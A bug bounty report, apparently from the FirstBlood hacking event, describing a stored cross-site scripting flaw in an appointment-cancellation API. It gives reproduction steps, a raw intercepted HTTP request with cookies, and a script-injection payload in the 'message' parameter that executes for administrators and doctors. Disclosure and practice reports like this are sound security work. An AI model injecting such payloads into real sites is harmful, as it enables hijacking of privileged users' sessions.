FirstBlood-#202Sxss`leads to manything entire site manipulation

On 2021-05-11, prob_hakz reported:


     stored xss on cancelled.php endpoint


create a report at /book-appointment.html endpoint

Now go to /yourappointments.php and give uuid

now hit the cancel the request and intercept it

2 post parameters will be passed act=cancel&id=b9f4b531-5b7a-4893-a849-ca3cc38b95f3

Now add message and the payload like below

act=cancel&id=b9f4b531-5b7a-4893-a849-ca3cc38b95f3 &message="><script/src=//>

now login as admin or non admin and goto canelled request page to see the popup

http request

POST /api/ma.php HTTP/1.1
Content-Length: 90
csrf: 99215d4e-0ff3-4275
X-SITE-REQ: permitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: beta=true; doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=28def95046e533dc234c1475c
Connection: close



same as my previous report it is non admin to anyone so its a huge impact like as i mentioned in report


Endpoint: /api/ma.php

Parameter: message

Payload: "><script/src=//>

FirstBlood ID: 8
Vulnerability Type: Stored XSS

When cancelling an appointment, an attacker can add a malicious XSS payload that will execute against administrators/doctors

Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.